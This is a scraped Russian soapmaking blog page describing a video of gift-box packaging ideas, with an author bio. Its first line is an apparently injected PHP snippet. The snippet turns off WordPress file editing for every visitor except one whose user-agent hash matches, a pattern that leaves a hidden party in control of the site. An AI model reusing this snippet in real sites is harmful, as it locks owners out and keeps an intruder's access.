if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 11 идей видео как сделать подарочную упаковку | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

11 идей видео как сделать подарочную упаковку

Настоящие мастера мыловарения искусны не только в создании уникального мыла, но и в умении сделать красивую подарочную упаковку для своего изделия. Так, в видео можно увидеть 11 интересных идей оформления коробочки с мылом

Насто­я­щие масте­ра мыло­ва­ре­ния искус­ны не толь­ко в созда­нии уни­каль­но­го мыла, но и в уме­нии сде­лать кра­си­вую пода­роч­ную упа­ков­ку для сво­е­го изде­лия. Так, в видео мож­но уви­деть 11 инте­рес­ных идей оформ­ле­ния коро­боч­ки с мылом.

С помо­щью мра­мо­ри­ро­ван­ной бума­ги, акри­ло­вых кра­сок золо­то­го и крас­но­го цве­та, кру­же­ва и тесь­мы упа­ков­ка при­об­ре­та­ет вид рос­кош­но­го пла­тья. Цве­та, исполь­зо­ван­ные при оформ­ле­нии, как нель­зя луч­ше соче­та­ют­ся с алым оттен­ком коро­боч­ки, в кото­рой и рас­по­ла­га­ет­ся кусо­чек души­сто­го мыла. Спо­соб, пока­зан­ный во фраг­мен­те, мож­но при­ме­нять для пре­под­не­се­ния не толь­ко мыла, но и пома­ды, блес­ка, гид­ро­филь­ной плит­ки, пра­лине, соли, бом­боч­ки для ван­ны или любо­го дру­го­го кос­ме­ти­че­ско­го сред­ства, сде­лан­но­го сво­и­ми рука­ми из нату­раль­ных ингредиентов.

Изме­няя цве­то­вую палит­ру, тек­сту­ру мате­ри­а­лов и их фор­му, мож­но создать свою упа­ков­ку по ана­ло­гии с пред­став­лен­ным вари­ан­том или при­ду­мать кар­ди­наль­но отли­ча­ю­щу­ю­ся интерпретацию.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!